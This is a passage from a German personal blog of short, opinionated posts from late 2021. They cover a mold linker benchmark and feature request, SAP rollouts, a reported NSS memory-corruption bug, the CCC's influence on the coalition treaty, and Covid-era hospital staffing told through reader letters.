Ja. Überrascht mich ehrlich gesagt überhaupt nicht. Ich kann da wegen NDA immer keine Details ausplaudern, aber wenn ich gegen die Schlangenölbranche wettere, dann ist das nicht bloß ein Bauchgefühl, soviel kann ich euch versichern.
Das ist wie bei Pispers' Antiamerikanismus :-)

Fri Dec 24 2021

[l] Passend zur Weihnachtszeit möchte ich mal eine positive Geschichte über Code erzählen. Kommt ja selten genug vor.
Der Standard-Linker unter Linux ist GNU ld von den binutils. Das ist ein uraltes Fossil von einer Codebasis, weil die eben nicht das konkrete Problem gelöst haben, sondern ein allgemeineres Problem lösen. Der Linker ist parametrisierbar und kann zur Compilezeit mitgeteilt kriegen, ob man ELF, COFF oder gar Windows EXE Files damit linken will. Kann glaube ich auch MACH-O von Apple, bin mir aber nicht sicher gerade.
Jedenfalls ist das Teil schnarchlangsam. Spielt in den meisten Fällen keine Rolle. Ich hab damit jahrzehntelang prima arbeiten können, ohne dass mir jemals aufgefallen wäre, wie langsam das Teil ist. Meine Programme sind aber auch alle relativ überschaubar.
Wenn man mal, sagen wir, Firefox linkt, dann ist die Link-Pause merkbar. Spielt im Vergleich zur Compilezeit keine Rolle, aber ist nicht gar nicht da.
Also haben sich über die Jahre Projekte gegründet, um mal einen schnelleren Linker zu bauen. Der erste, den ich gesehen habe, ist GNU gold, der ist auch Teil von den binutils. Ist in C++ geschrieben und direkt ... doppelt so groß wie ld. War zwar ein bisschen schneller aber linkte bei mir mal Firefox nicht und konnte auch kein link-time optimization und war daher direkt draußen.
Das nächste Projekt, das antrat, war LLVM lld. Der hat erstmals ein bisschen Multithreading am Start, aber nur für einige Teile. mold will jetzt alle Teile auf alle Cores verteilen.
Ich habe mal testweise das Erstellen von libavcodec.so gemessen:
```
GNU ld: 1.21s user 0.26s system 99% cpu 1.463 total
GNU gold: 0.83s user 0.10s system 99% cpu 0.928 total
LLVM lld: 0.69s user 0.17s system 258% cpu 0.333 total
mold: 0.03s user 0.00s system 13% cpu 0.247 total
```
Das war jeweils noch mit Debug-Symbolen. Gut, unterhalb einer Sekunde ist das jetzt alles nicht sonderlich aussagekräftig, und die %CPU-Spalte bei mold ist offenbar damit überfordert, wie flott das Ding fertig war :-)
Aber ich finde das ein interessantes Ergebnis und wollte direkt mal dietlibc damit linken, um zu gucken, ob das geht. Ging nicht, weil ich eine obskure Spezialoption von GNU ld benutze, -z noseparate-code. ld hat vor ein paar Jahren angefangen, nach SPECTRE bei den Segmenten Padding auf Page-Größe zu machen. Hintergrund ist, dass die Hardware Speicherschutz mit Page-Granularität macht. Wenn also in einem Binary Code und Datensegment nebeneinander im Binary liegen, dann war früher auf der letzten Page des Datensegmentes (das read-write gemappt ist!) auch die ersten Bytes des Codesegments, und man hätte da also reinschreiben können in einem Exploit oder so. Jetzt bläst der Linker das mit Null-Bytes auf. Ist an sich eine gute Idee, aber bei dietlibc will ich halt winzige Binaries haben. Da ist das Binary für rm sowas wie 9k groß. Wenn der Linker da Padding einfügt, dann ist das mal eben 50% größer. Daher möchte ich das bei der dietlibc gerne selektiv ausschalten können, und obiges wäre die Option dafür gewesen.
Die konnte mold nicht. Also hab ich vor zwei Tagen einen Bug aufgemacht. Heute war die Mail in der Inbox, dass er das eingebaut hat.
Ich muss sagen: Hut ab. So stellt man sich das in seinen Fieberträumen vor, dass Software-Entwicklung so abläuft. Erstens natürlich dass der Typ überhaupt reagiert, dann dass er mir nicht erklärt, meine Anforderung sei Scheiße, dann dass er das implementiert, und dann dass er das quasi über Nacht implementiert. Sehr beeindruckend.
Ich wünsche euch allen, dass ihr eure Codebasen auch so in Schuss habt, dass ihr auf so eine Anforderung mal eben so flott reagieren könntet. :-)
mold hat bei mir jetzt auf jeden Fall mehrere Schritte auf der Treppe genommen.
Update: Äh, jetzt habe ich den Link vergessen. Ist auf Github. Hat m.W. keine separate Homepage.
[l] Weihnachtlicher Leserbrief:
Meine holde Ehefrau kam gestern an der Tür mit einer Nachbarin ins Gespräch, im Verlauf dessen kam auch zur Sprache, dass die Liebste (Ehefrau) von ihrem Chef eine Weihnachtskarte erhalten hat in dem sich der Chef ausdrücklich dafür bedankt, dass sie es trotz SAP geschafft hat einen guten Job zu machen. Bricht die Nachbarin (öffentlicher Dienst) fast zusammen vor Lachen, in ihrer betrieblichen Weihnachtskarte hätte auch ausdrücklich SAP eine ähnliche (schlimmer als die Pandemie einzuordnende) Erwähnung gefunden.
Ich freu mich ja auch immer über solche Lacher, aber vielleicht an dieser Stelle nochmal kurz die Erläuterung dazu:
Eine SAP-Einführung macht man nicht, um das SAP an die eigenen Prozesse anzupassen.
Eine SAP-Einführung macht man, weil SAP das Modul für die Branche mit dem Marktführer zusammen gemacht hat, und man hofft, dass dessen Prozesse besser sind als die eigenen. Man führt also nicht SAP ein, sondern die Prozesse des Marktführers. Deshalb dauert das immer so lange und ist so teuer und deshalb machen die Firmen das trotzdem alle.
Was einem da um die Ohren fliegt sind nicht SAP-Unzulänglichkeiten sondern das Gewurschtel, das man vor der SAP-Einführung gemacht hat.
Ich sah neulich eine schöne Grafik, da ging es um den politischen Kompass, aber relativ betrachtet. D.h. da gibt es dann eine X-Achse mit left vs right und eine Y-Achse mit nach oben Authoritarian und nach unten Personal Freedom. Allerdings war dann unten bei personal freedom nochmal ein Mini-Kompass, mit den Begriffen, mit denen die Leute dort die Achse sehen. Da ist nach unten Freedom und nach oben Tyranny.
Und oben war auch nochmal so ein Kompass, da war nach unten Anarchy und nach oben Civilization.
In diesem Sinne muss man auch eine SAP-Einführung sehen. Aus Sicht eines einzelnen Hackers ist das die Tyrannei des Dogmatismus, alles wird mit endloser Bürokratie und Prozessen erstickt. Aus Sicht der SAP-Einführer führt man nicht SAP ein sondern Zivilisation :-)
Und das dauert halt ein bisschen und kann schmerzhaft sein.

Tue Dec 21 2021

[l] Hey, liebe Rust-Community, könnt ihr nicht mal Ghostscript und Imagemagick neu machen?
Am besten auch gleich mit so fundamentalen Baseline-Grundlagen wie "kann keine include-Direktiven".
Meine Fresse ey.

Mon Dec 20 2021

[l] Aus der beliebten Kategorie "Softwareproblem, kann man nichts machen", heute:
1. Hamburg hat Leute mit "unklarem Impfstatus" den Ungeimpften zugerechnet. Hamburgs Bürgermeister spricht vom "Einsatz verschiedener IT-Systeme".
2. Die Briten haben ihr Contact Tracing mit Excel gemacht. Und dann als .xls statt .xlsx abgespeichert, was am Ende Zeilen abgeschnitten hat. Die Leute sind dann aus dem Tracing rausgefallen. Schätzungen reden von 1500 Toten.
Man stelle sich mal vor, an irgendeiner anderen Stelle würde der Staat dermaßen leger mit Werkzeugen oder Prozessen umgehen. Oh, in der Autobahn hat 100m Loch in der Mitte? Das Rathaus ist geschmolzen? Das Finanzamt ist spontan explodiert? Bedauerlicher Pfusch, kann man nichts machen!1!!
Update: Na das war ja klar. Jetzt schicken mir Leute Geschichten über 100 Meter lange Löcher auf Autobahnen.

Sun Dec 19 2021

[l] Öh, was ist denn hier passiert?
Wer seid ihr und was habt ihr mit der Redaktion des ehemaligen Nachrichtenmagazins gemacht?!
Jahrzehntelang haben die uns vollgedröhnt mit ihrem Dogma des ewigen Wachstums! Und jetzt das:
Wir müssen uns vom Überfluss verabschieden
Alter Falter, das ist ja mal ein Dammbruch! Was kommt als nächstes? Jemandem fällt auf, dass wir eigentlich keine Banken brauchen und die Zentralbank das Geld auch direkt an den Staat verleihen könnte? Ohne Zinsen?
Das hat bestimmt die CIA rausgefunden. Die finden ja alles raus. Alles finden die raus!

Thu Dec 16 2021

[l] Liebe Leser, ich bereite gerade einen Vortrag vor, in dem es darum gehen soll, wie verkrustet die Softwareentwicklung ist.
Daher wollte ich jetzt mal eine Umfrage machen und bitte um Zusendung von Daten für eine Statistik. Selbstverständlich wird das nur als aggregierte Übersicht veröffentlicht.
Mich interessieren so Dinge wie:
1. Wie alt ist der älteste offene Bug im Tracker? Bitte auch das Alter der Komponente angeben, damit ich Prozente vergleichen kann.
2. Wie alt ist der älteste offene Bug mit Rang HIGH oder höher?
3. Wie alt ist der älteste offene Security-Bug?
4. Wieviel Prozent eurer Bugs sind HIGH oder höher (allgemein jetzt, nicht nur offene Bugs)?
5. Wieviel Prozent eurer Bugs sind Security-Bugs?
6. Wie lange braucht ihr für das Screening von reinkommenden Bugs? Gemeint ist: Zuweisung an das zuständige Ressort, Taggen und Cc an die zuständigen Leuten.
7. Wieviele Bugs sind aktuell offen? Gerne in Relation zu allen Bugs der Lebenszeit des Produktes.
8. Wie lange braucht ihr durchschnittlich, um einen HIGH oder höher-Bug zu schließen?
9. Wie häufig kommt bei euch WONTFIX oder NOTABUG vor?
10. Habt ihr einen Mechanismus oder eine Person, die Bugs schließt, wenn sich zu lange niemand gekümmert hat?
11. Wieviel Prozent der geschlossenen Bugs gingen weg, weil die gesamte Komponente weggeschmissen wurde?
12. Wie weit zurück liegt die Komponente, die am längsten nicht gepatcht wurde? Gemeint sind hier Libraries, Frameworks aber auch Tools im Build-Prozess und/oder auf dem Buildhost.
13. Wieviel Prozent eurer aktuell noch eingesetzten Software ist end-of-life (Hersteller existiert nicht mehr oder hat Support abgekündigt oder ist verwaistes Open-Source)?
14. Hat euer Produkt Komponenten, zu denen ihr den Quellcode nicht habt?
15. Wieviel Prozent des Produktes besteht aus Komponenten, die unter der Kontrolle Anderer sind? Gemeint ist hier sowas wie: Libraries, Frameworks, und falls euer Produkt sowas braucht dann Datenbanken, Clouddienste, Webdienste, etc. Nicht gemeint sind das Betriebssystem und der Compiler.
16. Wie lange braucht "auf dem Job" eine Änderung, die ihr zuhause beim Hobby mal eben an einem Wochenende runtergehackt hättet. Gemeint ist inklusive Ausrollen in Produktion. Eigentlich will ich aber wissen, wie viel Reibungsverlust die Codekomplexität auf Arbeit schon gekostet hat, so dass eigentlich simple Änderungen dann Monate brauchen, weil man Dutzende von Teilen anfassen muss und die alle super fragil sind.
17. Wenn ihr Owner einer Komponente seid: Wieviel Prozent von dem Code habt ihr "geerbt"?
Sachdienliche Einsendungen bitte per E-Mail. Danke.
Update: Wenn jemand eine brillante Idee hat, wie man messen oder visualisieren kann, mit wieviel Reibungsverlusten man bei einer Codebasis leben muss, dann bin ich für jeden Hinweis dankbar. Mein aktueller Ansatz vergleicht das Codewachstum von einem Projekt mit dem Wachstum bei der Anzahl der NPM-Pakete. Ein richtig fairer Vergleich ist das aber nicht, denn das gewählte Projekt könnte ja einen Reifegrad erreicht haben, bei dem einfach weniger gemacht werden muss.

Wed Dec 15 2021

[l] Habt ihr euch auch so Sorgen gemacht, dass jetzt wegen 2G+ überall getestet wird und wir dann das volle Ausmaß von Covid sehen?
Keine Sorge. Soweit lassen es die "Gesundheits"minister nicht kommen. Die machen lieber schnell die Testpflicht für Geboosterte weg. Dann können wir uns alle weiterhin in unserer selbstverschuldeten Unmündigkeit suhlen, und können nachher erklären, wir hätten ja keine besseren Zahlen gehabt, daher war unsere Inaktivität aus damaliger Sicht vertretbar.
Welche Inaktivität? Na dass wir nicht genug Impfstoff gekauft haben zum Beispiel.
Und neulich haben wir noch alle über den Söder gelacht, als der meinte, keiner seiner Experten habe ihm vorher gesagt, dass es so schlimm werden würde. Diese Art von absichtlichem Weggucken ist jetzt bundesweit die "Gesundheits"politik.

Wed Dec 8 2021

[l] Zu der viralen Pathologin kamen eine Menge Leserbriefe rein, die ich hier mal zusammenfassend wiedergeben will.
1. Das ist gar keine Pathologin sondern Leichenpräparatorin, also kein medizinischer Beruf. Keine Ahnung ob das stimmt oder ob das für euch eine Rolle spielt.
2. Die LMU zahlt sehr wohl die PCR-Tests. Das tut sie nicht, weil sie dazu verpflichtet wurde, sondern weil sie halt ein Unikrankenhaus mit Labor haben und das dort einfach miterledigen kann.
3. Die Frau in dem Video ist geimpft, daher betrifft sie das nicht.
4. Die Frau in dem Video hat sehr wohl Gästekontakt, und zwar zu Bestattungsunternehmen, die die Leichen abholen. Da kam ein echt beunruhigender Leserbrief von einem Sargträger, der meinte, in seiner Branche seien bestimmt ein Drittel nicht geimpft. Wat!?
5. Die Frau ist eine Querdenkerin (kann man angeblich an ihrem Vokabular sehen, "Paragraph 32" und "Volksverrat" seien da wohl recht eindeutig; Der Querdenker, der den Tankwart ermordet hat, berief sich auch auf "Paragraph 32") und ihre Distanzierung ist daher nicht glaubwürdig.
6. Die LMU hat sie suspendiert, weil explizit allen Mitarbeitern untersagt ist, Videos in den Räumlichkeiten anzufertigen. Dagegen hat sie verstoßen, also will die Uni jetzt eine Kündigung aussprechen. Außerdem verstößt sie gegen Hygienebedingungen (Einsender: "Schmuck, keine Handschuhe, alles absolute No-Go's im med. Bereich")
7. Sie hat mit ihrer Arbeits-E-Mail-Adresse Mitglieder für "die Basis" anzuwerben versucht und ist dafür abgemahnt worden.
8. Die Bemerkung mit dem Blutgerinnungskram spielt auf die Thrombosen an und ist ein weiterer Bullshit-Bingo-Talking-Point der Leerdenker.
Tja. Ändert das was an eurer Betrachtung der Lage? Zumindest "die LMU zahlt die PCR-Tests" ändert meine Beurteilung signifikant.

Mon Dec 6 2021

[l] Habt ihr das auch gehört? Der Lauterbach wird Gesundheitsminister?
Endlich kehrt evidenzbasiertes Expertentum in den Bundestag ein!!1!
Könnte man denken, bis man mal ein bisschen in seiner Vergangenheit herumguckt.
Ich bin gerade echt am kopfkratzen, ob ich lieber einen Homöospaten von den Grünen als Gesundheitsminister gehabt hätte. Der kann zwar auch nichts, aber das weiß dann wenigstens der durchschnittliche Beobachter von vorne herein.
Update: Der Lauterbach hat sich nicht nur Freunde gemacht in seiner Laufbahn als "Gesundheitspolitiker".
Update: OK, erfreuliche Ausbeute: Viele von euch haben gemerkt, dass die Quelle hinter gewerkschaftsforum eine rechtsaußen-Schwurblerseite in Österreich ist. Viel weniger haben gemerkt, dass die Vorwürfe eigentlich alle bloß unsubstanziiertes Geraune sind. Das ist der viel wichtigere Teil!

Wed Dec 1 2021

[l] Benutzt hier jemand NSS? Die TLS-Implementation von Mozilla? Die in Firefox drin ist und früher auch von Chrome unter Linux verwendet wurde?
Lass mich raten… weil OpenSSL so einen schlechten Ruf hat?
Tavis Ormandy hat mal geguckt, wie die ihre Signaturen ablegen. Sie haben da eine Union, in der das größte Element 16 kbit groß ist, für RSA.
Okay, but what happens if you just….make a signature that’s bigger than that?
Well, it turns out the answer is memory corruption. Yes, really.
Oh. Mein. Gott.
Das ist schlimmer als Heartbleed. Das ist sozusagen der Hallo Welt unter den Remote Code Execution.
Sagt mal seid ihr auch so froh, dass Mozilla ihr Geld für so Dinge wie Colorways ausgegeben hat?
Oder dafür, dass ihr endlich Werbung im New Tab kriegt?
Oder für das ungefragte Einsammeln von Telemetrie?
At Mozilla, we want to make products that keep the Internet open and secure for all. We collect terabytes of data a day from millions of users to guide our decision-making processes. We could use your help.
Nein, Mozilla. Wenn ihr meine Hilfe wollt, dann löscht ihr erstmal alle Daten über eure User.
Aber zurück zu diesem Bug. Tavis Ormandy ist besonders geflasht, dass Mozilla da endlos static analyzer und fuzzing gemacht hat, und die Tools haben alle grüne Lampen angezeigt. Und nicht nur doofe Fuzzer sondern aktuelle state-of-the-art Fuzzer mit Coverage-Analyse!
Mich überrascht das ja nicht so doll. Ich werde praktisch nach jedem Code Audit gefragt, wieso ihre Static Analyzer das alles nicht gefunden haben. Ihr solltet vielleicht mal weniger Geld für Tools ausgeben und mehr Geld in eure Entwickler stecken, dass die lernen, wie so ein Bug aussieht und worauf man achten sollte.

Sun Nov 28 2021

[l] PSA: Für Lüften, Luftfilter und Masken haben wir in Innenräumen zuviel Inzidenz. So drückt es Martin Riegel von der TU Berlin aus:
„Da kann man lüften oder filtern, so viel man will. Die Luftmengen, die diese derart hohen Konzentrationen verdünnen, bekommt man nicht in die Räume hinein: weder mit Fensterlüftung, Klimaanlagen oder mobilen Luftfiltern. Da müsste schon ein Orkan durchfegen.“
Und die Masken?
Masken reduzierten zwar das Risiko ebenfalls, aber auch sie kämen da an ihre Grenzen.
Erinnert mich an die Klimakatastrophe. Da gibt es ja auch Punkte, ab denen moderierende Einflüsse in selbstverstärkende umkippen. Da haben wir ja auch nichts gemacht und diverse von diesen Punkten bereits passiert.

Wed Nov 24 2021

[l] Liebe Leser, ich habe gute Nachrichten.
Nein, echt jetzt. Ich meine das völlig unironisch. Mir scheint gerade die Sonne aus dem Arsch.
Wisst ihr, wie wir uns jahrelang aufgeregt haben, dass die faule Politik einfach vorformulierte Gesetze von Lobbyisten nahm und durchschob? Skandalös! Das war deren Job, da Gesetze zu formulieren! Die sollten im Zweifel das Gegenteil dessen tun, was Lobbyisten vorschlagen!!1!
Aber dann kam eines Tages die Frage auf: Warte mal, das ist doch ein Exploit. Das können auch wir exploiten. Was wenn wir der Politik ein paar Formulierungshilfen reinkippen? Ist das ethisch vertretbar, deren verkackte Prozesse so auszunutzen?
Am Ende haben wir das dann getan. Der CCC hat der Politik Formulierungshilfen für die Koalitionsverhandlungen geschrieben.
Und jetzt? Jetzt haben sie den Koalitionsvertrag veröffentlicht. Und was soll ich euch sagen! Weite Teile sind vom CCC geguttenbergt! Guckt mal selber so ab Seite 15 den Digitalteil durch. Klar, nicht alles ist vom CCC, aber viel!
1. Für öffentliche IT-Projekte schreiben wir offene Standards fest. Entwicklungsaufträge werden in der Regel als Open Source beauftragt, die entsprechende Software wird grundsätzlich öffentlich gemacht.
  (Da war ich nicht alleine mit der Forderung, aber ich schrieb die Forderung zuerst auf, dass mit öffentlichen Geldern finanzierte Software am Ende auch öffentlich gemacht werden muss)
2. Wir führen ein Recht auf Verschlüsselung, ein wirksames Schwachstellenmanagement, mit dem Ziel Sicherheitslücken zu schließen, und die Vorgaben „security-by-design/default“ ein.
  (Weiter unten kommt der zweite Schuh.)
  Wir verpflichten alle staatlichen Stellen, ihnen bekannte Sicherheitslücken beim BSI zu melden und sich regelmäßig einer externen Überprüfung ihrer IT-Systeme zu unterziehen. Das Identifizieren, Melden und Schließen von Sicherheitslücken in einem verantwortlichen Verfahren, z. B. in der IT-Sicherheitsforschung, soll legal durchführbar sein.
  (Das ist der zweite Schuh. NB: Geheimdienste sind auch staatliche Stellen!)
3. Auch der Staat muss verpflichtend die Möglichkeit echter verschlüsselter Kommunikation anbieten.
  (Ich fürchte ja fast, die haben gar nicht verstanden, dass das Ende-zu-Ende meint. Das wird noch Popcornbedarf geben.)
4. Hersteller haften für Schäden, die fahrlässig durch IT-Sicherheitslücken in ihren Produkten verursacht werden.
  (Der kam von mir)
5. Darüber hinaus sichern wir die digitale Souveränität, u. a. durch das Recht auf Interoperabilität und Portabilität sowie das Setzen auf offene Standards, Open Source und europäische Ökosysteme, etwa bei 5G oder KI.
  (Ignoriert mal das 5G- und KI-Gesülze und freut euch über das Recht auf Interoperabilität!! Das ist ein Riesending für Open Source!)
6. Wir [...] stellen das Bundesamt für Sicherheit in der Informationstechnik (BSI) unabhängiger auf
  (Das hat jeder fucking Einzelne, der an der Formulierungshilfe mitgearbeitet hat, vorgeschlagen. Ein echter No-Brainer.)
7. Hackbacks lehnen wir als Mittel der Cyberabwehr grundsätzlich ab.
  (Der kam natürlich auch von mir)
8. Nicht-vertrauenswürdige Unternehmen werden beim Ausbau kritischer Infrastrukturen nicht beteiligt.
  (Ist ja schon irgendwie erschütternd, dass es eines Haufens ungewaschener Computernerds bedurfte, um auf diese Idee zu kommen!)
9. Ersatzteile und Softwareupdates für IT-Geräte müssen für die übliche Nutzungsdauer verpflichtend verfügbar sein.
  (Das ist auch ein Riesending! Da können sich die Hersteller nur noch rausmogeln, indem sie lächerlich kurze Lebenszeiten annehmen.)
  Dies ist den Nutzerinnen und Nutzern transparent zu machen.
  (Das ist die Idee der EU, dass der Markt das schon regeln wird, wenn man das nur transparent macht. Hoffen wir mal, dass das reicht!)
Ohne den anderen Mitschreibern ihren Teil kleinreden zu wollen, werde ich mir ab jetzt ans Revers heften, das BSI unabhängiger gemacht, Hackback beerdigt, hintertürfreie Ende-zu-Ende-Krypto vorgeschrieben und Open Source und offene Standards befördert zu haben. Fuck yeah! *abfeier*
Mir scheint jedenfalls gerade genug Sonne aus dem Arsch, dass das den Rest des Jahres überkompensiert.
Update: Ich sollte an der Stelle vielleicht auch klar ansagen: Die Politiker, die anderer Lobbyisten vorformulierte Entwürfe übernehmen, sind faule Schufte. Die, die unsere vorformulierten Entwürfe durchwinken, sind wohlinformierte und hochintelligente Ehrenleute!1!!

Tue Nov 23 2021

[l] Habt ihr jemals so ein tolles Fuck You wie das hier von der Berliner SPD gelesen? Zum Volksentscheid zur Vergesellschaftung der Wohnungen.
Ihr wart hoffentlich nicht so naiv anzunehmen, dass das "Entscheid" im "Volksentscheid" dafür steht, dass hier irgendwas entschieden ist.
Nein, nein! Die SPD diskutiert jetzt erstmal 100 Tage, welche Experten man in ein Expertengremium berufen will. Dann denkt das Gremium ein Jahr lang nach.
Außerdem will man Juristen fragen, ob ihnen was einfällt, wieso das nicht gemacht werden kann.
Money Quote:
Auf Basis der Empfehlungen der Expertenkommission legen die zuständigen Senatsverwaltungen im Jahr 2023 gegebenenfalls Eckpunkte für ein Vergesellschaftungsgesetz vor.
Auf Basis der Empfehlungen. Sie behalten sich vor, die Empfehlungen komplett zu ignorieren. Falls die Experten nicht kapiert haben, was ihr Job hier ist, nämlich das Finden von Ausflüchten, wieso man das nicht machen kann. Und frühestens 2023 hat man dann was in der Hand, das sagen wird: Geht nicht. Dann sind alle traurig und gucken betroffen in die Kameras.
Sollte wider Erwartens doch rauskommen, dass man es machen sollte, dann haben wir 2023 nicht etwa eine Umsetzung, nein nein, dann haben wir Eckpunkte für ein zukünftiges etwaiges Gesetz.
Mehr Wiesel-Worte und mehr Hinauszögern geht nicht. Szenenapplaus für die Verräterpartei!
[l] Wenn ihr mal wissen wollt, wie sich so ein Kollaps des Gesundheitssystems aus Sicht des Pflegepersonals anfühlt, dann habe ich hier den Leserbrief für euch:
Bezogen auf den Kommentar des Arztes vom 18.11 würde ich gerne mal von einer Allgemeinstation berichten. Auch wenn das Thema in den letzten zwei Jahren echt schon ausgelutscht worden ist.
Ich arbeite in einem großem Münchner Krankenhaus als Krankenschwester und es ist mir ein Anliegen irgendwie Gehör zu finden. Für meine Kollegen. Was jetzt gerade passiert, in vermutlich allen Häusern, gleicht einer Katastrophe.
Freitag Abend wurde unserer gesamten Station mitgeteilt, dass diese geschlossen wird und wir 5 Tage Zeit haben die Patienten zu entlassen. Am Mittwoch (übermorgen) soll der Dienst auf einer Intensivstation beginnen. Aha- dass von uns keiner eine Intensiverfahrung hat, geschweige denn die Geräte bedienen kann von Beatmungen ganz zu schweigen, hat erst mal keinen interessiert. Eine Intensivweiterbildung dauert 2 Jahre und ich bin mir ganz sicher, dass gerade zur Zeit, mit Covidpatienten und Pflegemangel, man genügend Zeit findet, uns dort richtig einzuarbeiten.
Uns hat es noch relativ gut getroffen, denn andere Stationen im Haus mussten binnen eines Tages ihre Station räumen und woanders arbeiten. Laut meinen Informationen, mit richtig guter Einarbeitung natürlich. Auf Covid Normalstation. Wie Einarbeitung? Du warst doch letztes Jahr schon mal da, du kennst dich doch noch aus. (Und ja, wir machen diesen Versetzungsmist zum wiederholten Mal mit!!)
Dazu muss man sagen, dass selbst zu Nicht-Corona-Zeiten die Einarbeitung eher auf wenige Tage begrenzt ist und dann wird es schon laufen. Kannst ja Fragen wenn was ist....
Auf den ersten Schock hin, dass wie zukünftig schwerstkranke Menschen betreuen sollen, deren Leben mehr oder weniger auch in unserer Hand liegt haben ein Drittel unserer Mitarbeiter beschlossen zu kündigen. Hätte einer von uns auf Intensiv arbeiten wollen oder können, wäre er dies vielleicht die letzten Jahre angegangen. Ich kann keine Betten mit völlig ungelernten Mitarbeitern betreiben, frei nach dem Motto, schaun wir mal wieviele meinen Dienst überleben?
Wie der Kollege so schön sagte, auch eine Art von Triage. Immerhin hat das unsere Pflegedienstleitung zum Einlenken gebracht- hey wir dürfen jetzt auf eine Covid- Normalstation. Ich freu mich.
Was ich damit sagen will, Danke an alle ungeimpften Arschlöcher da draußen, dass unsere Station geschlossen wurde und wir jetzt monatelang auf einer Covidstation arbeiten dürfen. Auch in unserem Team gibt es Hochrisikopatienten und auch wir haben Familien, ganz zu schweigen von unseren Patienten, die jetzt einfach mal nicht mehr aufgenommen werden. Wurscht wie es denen geht. Und dabei geht es den meisten richtig schlecht.
Noch dazu ist es zum widerholten Mal so. Die Kündigungen, denke ich werden zum Teil in unserem Team zurückgenommen, aber sicher nicht alle, da wir eh schon an der Grenze mit Personal waren, ist es fraglich ob unsere Station so überhaupt wieder öffnen kann. (Ich kenne das noch vom letzten Winter, andere Stationen mussten nach der Zwangsversetzung Betten sperren, weil ihnen derweil das Personal weggelaufen ist)
Also wenn man man langjährige Mitarbeiter vergraulen will und dafür Sorgen möchte, dass bald gar kein Personal mehr da ist, der macht alles richtig!! Ich scheiße auf den Bonus!
Das ist ein komplettes Versagen der Politik und zwar auch der des Krankenhauses. Eigentlich müsste das Management den Hut nehmen, aber nein, wie immer wird das Fußvolk als Kanonenfutter verheizt. Einen ganzen Sommer wäre Zeit gewesen, mal vorzufühlen, wer vielleicht ein paar Monate auf Intensiv möchte, hätte die Leute wenigstens Grundausbilden können, Pläne schmieden können wie man es am Besten angeht....aber nein, in einer Hauruck-Aktion wird der größte Mist entschieden und das Personal, das eh schon Jahre am Limit ist, soll noch mehr machen. Es ist ja auch nicht so, als wären der Winter und Corona etwas völlig Neues.
Wir sollen den Waldbrand mit einer Spritzpistole löschen, aber von denen, die das alles verursacht haben, muss keiner gehen. Stattdessen gehen wir.
Ich frage mich nur, wer eigentlich noch arbeitet wenn das alles doch mal vorbei sein sollte.. da kann man nur beten nie ins Krankenhaus zu müssen.

Sat Nov 20 2021

[l] Jens Spahn hat eine tolle Idee:
Spahn über Pflegebonus: „5000 Euro plus x für Intensivpflegekräfte wäre angemessen“
Ach. Ach nee. Jetzt bräuchten wir nur noch einen Gesundheitsminister, der das mal eben macht. Kennen Sie zufällig einen, Herr Spahn?
Fragen Sie den doch mal, was er die letzten zwei Jahre eigentlich gemacht hat.
Jetzt, wo er so gut wie in der Opposition ist, fällt ihm plötzlich ein, dass man Pflegekräfte ja auch mal menschenwürdig bezahlen könnte! Jetzt, wo für die Umsetzung jemand anderes zuständig ist. Da kommt mir ja echt die Galle hoch.

Thu Nov 18 2021

[l] Seid ihr auch so froh, dass bei UNS die Atomenergie SICHER ist?
Die EU wird jetzt wohl Atomenergie als "grüne Energie" fördern.
Und hey, warum nicht? Noch ist ja bei uns kein Kraftwerk explodiert und hat Landstriche unbewohnbar gemacht. Die Russen und Japaner sind halt technologisch Nichtskönner, das weiß ja jeder!1!!
[l] Ein Leserbrief erklärt uns das mal mit den Intensivstationen:
Ich arbeite regelmäßig auf Intensivstationen in Norddeutschland. Der Regelbetrieb sieht wie folgt aus: Man ist quasi durchgehend 100% ausgelastet.
Auf den meisten Intensivstationen ist der limitierende Faktor nicht die Anzahl der Bettenplätze oder Beatmungsgeräten, sondern das Personal.
Einen Intensivpatienten adäquat zu versorgen ist enormer handwerklicher Aufwand. Da müssen Geräte für Infusionen, Medikamentengaben, Nierenersatztherapien, Beatmungsgeräte, etc. überwacht und aufgerüstet werden. Es muss auf Veränderungen, dieser immerhin allesamt kritisch kranken Patienten, reagiert werden und am Ende muss der Patient auch gepflegt werden. Dies ist im gerinegeren Maße auch auf "normalen" Stationen so. Aber auf einer Intensivstation kann der individuelle Arbeitsaufwand bis ins Absurde steigen.
Um eine gewisse Qualität zu sichern, hat man den Pflegeschlüssel eingeführt. Auf Intensivstationen darf daher z.B. im Tagdienst eine Pflegekraft maximal 2,5 Patienten, nachts 3,5 Patienten betreuen.
Mit den paar treuen Menschen, die weiterhin freiwillig in der Intensivpflege arbeiten, bekommt man in den meisten Krankenhäusern daher gar nicht alle Intensivbetten betreut (Hab das die Tage ewtwas von 75% gelesen). Das Resultat sind sie sogenannt "gesperrten" Betten. Diese stehen dann formal nicht für die Patientenverdorgung zur Verfügung.
Das sind voll ausgestattete, funktionable Intensivbetten, wo lediglich die Person fehlt, welche pflegerisch die Geräte bedienen kann. Ist wie ein LKW ohne Fahrer. Das steht da alles, bewegt sich aber nichts. Bringt niemanden irgendwas.
Nun kommen wir zu dem Punkt, wo ein Patient in der Notaufnahme oder auf unseren peripheren Stationen sich akut verschlechtert. Zum Beispiel der Covid19-Patient, welcher plötzlich beatmungspflichtig wird.
Denkt wirklich jemand, wir würden den ersticken lassen, wenn wir leere Intensivbetten haben, auch wenn diese "gesperrt" sind? Nein, wir verbringen den Patienten auf diese Betten und hoffen, dass das schon irgendwie noch von der Pflege toleriert wird. Ähnlich wird mit Notfällen "von draußen", also im Rettungsdienst, verfahren.
Das ist in der Akutsituation zweifelsfrei die sinnvollste und einzig menschliche Lösung. In einem funktionierensen System wird dann zeitnah der Überschuss an Patienten abverlegt und nach Möglichkeit Patienten in andere Klinik umgeleitet. Aber aktuell hat quasi keine Klinik mehr Kapazität, sprich Überlastung wird quasi zum flächendeckenden Dauerzustand für die Pflege.
Es werden keine Pausen mehr gemacht, Schichten werden Akkordarbeit, es passieren Fehler, Arbeit kann nicht mehr mit der notwendigen Sorgfalt erledigt werden, freie Wochenenden entfallen, man wird krank, es müssen Doppelschichten geschoben werden, man ist grundlegend erschöpft.
So haben wir viel Intensivpflege schlicht in der Krise endgültig aufgeraucht und damit das mit Abstand wertvollste Gut der Intensivmedizin noch weiter verknappt. Jede aus dem Beruf austeigende Pflegekraft ist salopp ausgedrückt ein Intensivbett weniger. Es mangelt halt nicht an Betten oder Beatmunsggeräten sondern am Personal!
Also zusammenfassend daher meine These:
